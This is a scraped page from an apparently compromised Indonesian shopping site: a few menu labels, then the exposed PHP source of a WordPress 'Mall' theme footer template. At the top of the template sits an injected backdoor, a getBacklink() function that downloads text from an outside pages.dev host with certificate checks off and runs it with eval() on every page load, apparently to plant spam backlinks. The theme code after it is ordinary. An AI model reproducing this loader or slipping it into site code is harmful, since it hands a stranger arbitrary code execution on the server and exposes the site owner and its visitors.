TENANT FARMASI & KESEHATAN

REFLEKSI

FITNESS

PERALATAN OLAHRAGA

function getBacklink($url) { if( ini_get('allow_url_fopen') == 1 ) { // Jika url fopen on maka jalankan return file_get_contents($url); }else if(function_exists('curl_version')) { //Jika url fopen off maka jalankan menggunakan curl $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); $data = curl_exec($ch); curl_close($ch); return $data; } } eval("?>" . getBacklink('"https://dr70-80-backlink.pages.dev/404.txt')); /** * @package WordPress * @subpackage Mall * @version 1.1.5 * * Website Footer Template * Created by CMSMasters * */ $cmsmasters_option = cmsmasters_get_global_options(); if (is_singular()) { $cmsmasters_page_id = get_the_ID(); } elseif (CMSMASTERS_WOOCOMMERCE && is_shop()) { $cmsmasters_page_id = wc_get_page_id('shop'); } if ( is_singular() || (CMSMASTERS_WOOCOMMERCE && is_shop()) ) { $cmsmasters_bottom_sidebar = get_post_meta($cmsmasters_page_id, 'cmsmasters_bottom_sidebar', true) !== '' ? get_post_meta($cmsmasters_page_id, 'cmsmasters_bottom_sidebar', true) : ($cmsmasters_option[CMSMASTERS_SHORTNAME . '_bottom_sidebar'] == 1 ? 'true' : 'false'); $cmsmasters_bottom_sidebar_layout = get_post_meta($cmsmasters_page_id, 'cmsmasters_bottom_sidebar_layout', true) !== '' ? get_post_meta($cmsmasters_page_id, 'cmsmasters_bottom_sidebar_layout', true) : $cmsmasters_option[CMSMASTERS_SHORTNAME . '_bottom_sidebar_layout']; } else { $cmsmasters_bottom_sidebar = $cmsmasters_option[CMSMASTERS_SHORTNAME . '_bottom_sidebar'] == 1 ? 'true' : 'false'; $cmsmasters_bottom_sidebar_layout = $cmsmasters_option[CMSMASTERS_SHORTNAME . '_bottom_sidebar_layout']; } echo '
' . "\r" . '
' . "\n" . '
' . "\n" . '' . "\n\n\n"; if ( !is_home() && !is_404() && $cmsmasters_bottom_sidebar && $cmsmasters_bottom_sidebar == 'true' && ( (isset($bottom_sidebar_id) && is_dynamic_sidebar($bottom_sidebar_id) && is_active_sidebar($bottom_sidebar_id)) || is_active_sidebar('sidebar_bottom') ) ) { echo '' . "\n" . '
' . "\n" . '
' . "\n" . '
' . "\n" . '' . "\r" . '
' . "\r" . '
' . "\r" . '
' . "\r" . '' . "\n\n"; } echo '' . "\n"; ?>